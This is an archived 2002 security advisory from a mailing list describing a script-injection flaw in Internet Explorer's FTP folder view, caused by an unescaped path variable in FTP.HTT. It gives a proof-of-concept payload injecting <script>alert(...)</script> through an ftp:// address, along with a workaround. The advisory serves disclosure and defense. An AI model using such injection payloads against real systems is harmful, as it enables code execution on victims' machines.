Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability

From: Eiji James Yoshida (ptrs-ejyat_private)
Date: Thu Jun 06 2002 - 08:33:44 PDT

Next message: Trustix Secure Linux Advisor: "TSLSA-2002-0055 - tcpdump"

Previous message: secureat_private: "[CLA-2002:494] Conectiva Linux Security Announcement - bind"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+ Title:
~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability


+ Date:
~~~~~~~~~~~~~~~~~
7 June 2002


+ Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [zaddikat_private]


+ Risk:
~~~~~~~~~~~~~~~~~
Medium


+ Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP2 IE5.5SP1
Windows2000 SP2 IE5.5SP2
Windows2000 SP2 IE6.0


+ Overview:
~~~~~~~~~~~~~~~~~
IE allows running Malicious Scripts due to a bug in 'folder View for FTP sites'.

If you enable both an 'Enable folder view for FTP sites' IE Advanced Setting 
and an 'Enable Web content in folders' Explorer Folder Option,
the script embedded in FTP Server Address will run.
(Both options are set to 'Enable' by default.)

 * It's important that the script runs in the My Computer zone!


+ Details:
~~~~~~~~~~~~~~~~~
The problem is in FTP.HTT invoked by the 'folder view for FTP sites' feature.
( %SystemRoot%\WEB\FTP.HTT )

- --------------------FTP.HTT--------------------
35:    <BASE href="%THISDIRPATH%\">
- -----------------------------------------------

This '%THISDIRPATH%' is not escaped. 

(Example 1)
[ ftp://TARGET ]
    '%THISDIRPATH%' = 'ftp://TARGET/'
    <BASE href="ftp://TARGET/\">
                ~~~~~~~~~~~~~
(Example 2)
[ ftp://"><script>alert("Exploit");</script> ]
    '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
    <BASE href="ftp://"><script>alert("Exploit");</script>/\">
                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ Exploit code:
~~~~~~~~~~~~~~~~~
<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>


+ Demonstration:
~~~~~~~~~~~~~~~~~
http://www.geocities.co.jp/SiliconValley/1667/advisory02e.html


+ Workaround:
~~~~~~~~~~~~~~~~~
Disable either 'Enable folder view for FTP sites' IE Advanced Setting 
or 'Enable Web content in folders' Explorer Folder Option.


+ Vendor status:
~~~~~~~~~~~~~~~~~
Microsoft was notified on 21 December 2001.


- ----------------------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: zaddikat_private
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- ----------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPP93/TnqpMRtMot1EQJE+gCg3tezyI7XyhSatXTXkjuwTqkiuroAoOkA
55mgpZ0K8d9mx/c0pS2Knqoe
=PTNT
-----END PGP SIGNATURE-----

Next message: Trustix Secure Linux Advisor: "TSLSA-2002-0055 - tcpdump"
Previous message: secureat_private: "[CLA-2002:494] Conectiva Linux Security Announcement - bind"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jun 06 2002 - 12:14:48 PDT